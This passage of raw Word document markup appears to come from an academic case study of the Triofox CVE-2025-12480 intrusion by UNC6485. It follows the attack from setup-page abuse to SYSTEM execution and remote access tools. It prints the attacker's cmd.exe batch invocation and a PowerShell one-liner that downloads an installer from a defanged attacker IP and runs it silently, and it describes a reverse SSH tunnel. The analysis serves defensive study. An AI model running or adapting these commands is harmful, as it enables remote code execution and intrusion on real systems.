                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="2479900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:after="160"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Conceptual reconstruction of the CanRunCriticalPage() authorisation decision. The Host == localhost branch returns before origin is verified. Redrawn by the author from the vulnerable code published by Mandiant; original synthesis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.3  From setup page to administrator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Access to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminDatabase.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not yet code execution, but it is the keys to the application. Following the normal setup workflow, the attacker created a new database, which unlocked the admin initialisation page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AdminAccount.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, which in turn redirects to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>InitAccount.aspx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create an administrator. UNC6485 used this to create a native admin account named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Cluster Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then logged in with it to perform all subsequent actions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. The application treated the re-run of setup as legitimate because, by design, whoever reaches setup is assumed to be the trusted operator standing up the instance for the first time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.4  Anti-virus abuse for code execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Triofox includes a feature that scans uploaded files with an anti-virus engine. The operator supplies the path to the scanner executable, and the configured program runs with the privileges of the Triofox parent process, which is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> account. The attacker pointed the anti-virus engine path at their own batch script, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>centre_report.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, then uploaded a file to a published share to trigger a scan. The script executed as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:jc w:val="left"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>C:\Windows\system32\cmd.exe /c</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>""c:\triofox\centre_report.bat"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">   C:\Windows\TEMP\eset_temp\ESET...av"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Nothing here is a software defect in the ordinary sense. The anti-virus integration worked exactly as built. What made it dangerous was the combination of an attacker-reachable configuration surface and a feature that runs an arbitrary operator-specified binary at the highest privilege. The access control flaw supplied the first; the feature's design supplied the second.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="180" w:after="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.5  Post-exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> execution, the batch script fetched a second stage. A PowerShell one-liner downloaded an installer from an attacker server and ran it silently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="80" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="113"/>
        <w:jc w:val="left"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>powershell -NoProfile -ExecutionPolicy Bypass -Command</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>"$url = 'http://84.200.80[.]252/SAgentInstaller...zip';</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>$out = 'C:\Windows\appcompat\SAgentInstaller...exe';</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Invoke-WebRequest -Uri $url -OutFile $out;</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Start-Process $out -ArgumentList '/silent' -Wait"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload, despite its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> name, was an executable: a legitimate Zoho Unified Endpoint Management System (UEMS) installer. The attacker used the UEMS agent to deploy the Zoho Assist and AnyDesk remote access tools, giving durable hands-on access without custom malware. Through Zoho Assist they enumerated SMB sessions and local and domain users, attempted to change account passwords, and tried to add accounts to the local Administrators and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Domain Admins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> groups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="737373"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [documented]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="120" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">For hands-on access, the attacker staged two renamed utilities in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>C:\Windows\Temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sihosts.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Plink, the PuTTY command-line SSH client) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Mono" w:hAnsi="Latin Modern Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>silcon.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PuTTY). These established an SSH reverse tunnel to a command-and-control server over port 433, through which the C2 could forward inbound RDP to the compromised host on port 3389. Figure 2 and Table 3 give the full sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2750704"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2750704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:after="160"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Documented CVE-2025-12480 attack chain, with the OWASP Top 10:2025 category most relevant to each stage. Original synthesis from the Mandiant investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Incident and disclosure timeline. Dates from Mandiant, Rapid7, and the CISA KEV catalogue.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1814"/>
        <w:gridCol w:w="7541"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Date (2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>26 July</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Triofox 16.7.10368.56560 released, fixing the flaw.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>24 August</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Earliest observed exploitation by UNC6485 (version 16.4.10317.56372).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>4 October</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7540"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="20" w:before="20" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Latin Modern Roman" w:hAnsi="Latin Modern Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
              </w:rPr>
